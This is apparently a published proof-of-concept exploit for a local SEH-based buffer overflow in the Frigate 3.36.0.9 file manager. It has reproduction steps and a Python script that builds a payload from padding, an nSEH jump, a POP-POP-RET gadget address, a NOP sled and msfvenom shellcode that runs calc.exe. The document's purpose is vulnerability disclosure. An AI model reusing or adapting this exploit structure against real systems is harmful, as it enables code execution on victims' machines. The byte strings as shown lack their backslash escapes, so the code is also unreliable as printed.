Frigate 3.36.0.9 – ‘Command Line’ Local Buffer Overflow (SEH) (PoC)

# Exploit Title: Frigate 3.36.0.9 - 'Command Line' Local Buffer Overflow (SEH) (PoC) 
# Vendor Homepage: http://www.frigate3.com/ 
# Software Link Download: http://www.frigate3.com/download/frigate3_pro.exe
# Exploit Author: Paras Bhatia
# Discovery Date: 2020-06-07
# Vulnerable Software: Frigate
# Version: < = 3.36.0.9
# Vulnerability Type: Local Buffer Overflow
# Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English)  

#Steps to Produce the Crash:

#   1.- Run python code: FrigateLCE.py
#   2.- Copy content to clipboard
#   3.- Turn off DEP for Frigate3.exe
#   4.- Open "Frigate3.exe"
#   5.- Go to "Command" > "Command Line" > "Activate Command Line"
#   6.- Paste ClipBoard into the "Command Line" field which appears at the bottom of the Frigate application.
#   7.- Press Enter from Keyboard.
#   7.- Click on OK in the dialog box that appears.
#   8.- Calc.exe runs.


#################################################################################################################################################

#Python "FrigateLCE.py" Code:

f= open("FrigateLCE.txt", "w")

junk="A" * 4112

nseh="xebx20x90x90"

seh="x4Bx0Cx01x40"

#40010C4B   5B               POP EBX
#40010C4C   5D               POP EBP
#40010C4D   C3               RETN
#POP EBX ,POP EBP, RETN | [rtl60.bpl]  (C:Program FilesFrigate3rtl60.bpl)

nops="x90" * 50

# msfvenom -a x86 --platform windows -p windows/exec CMD=calc -e x86/alpha_mixed -b "x00x14x09x0ax0d"  -f python

buf =  ""
buf += "xbfxe3xfax7bx97xdbxd5xd9x74x24xf4x5dx2b"
buf += "xc9xb1x30x83xedxfcx31x7dx0fx03x7dxecx18"
buf += "x8ex6bx1ax5ex71x94xdax3fxfbx71xebx7fx9f"
buf += "xf2x5bxb0xebx57x57x3bxb9x43xecx49x16x63"
buf += "x45xe7x40x4ax56x54xb0xcdxd4xa7xe5x2dxe5"
buf += "x67xf8x2cx22x95xf1x7dxfbxd1xa4x91x88xac"
buf += "x74x19xc2x21xfdxfex92x40x2cx51xa9x1axee"
buf += "x53x7ex17xa7x4bx63x12x71xe7x57xe8x80x21"
buf += "xa6x11x2ex0cx07xe0x2ex48xafx1bx45xa0xcc"
buf += "xa6x5ex77xafx7cxeax6cx17xf6x4cx49xa6xdb"
buf += "x0bx1axa4x90x58x44xa8x27x8cxfexd4xacx33"
buf += "xd1x5dxf6x17xf5x06xacx36xacxe2x03x46xae"
buf += "x4dxfbxe2xa4x63xe8x9exe6xe9xefx2dx9dx5f"
buf += "xefx2dx9excfx98x1cx15x80xdfxa0xfcxe5x10"
buf += "xebx5dx4fxb9xb2x37xd2xa4x44xe2x10xd1xc6"
buf += "x07xe8x26xd6x6dxedx63x50x9dx9fxfcx35xa1"
buf += "x0cxfcx1fxc2xd3x6exc3x05"




payload = junk + nseh + seh + nops + buf

f.write(payload)
f.close
            

Comments are closed.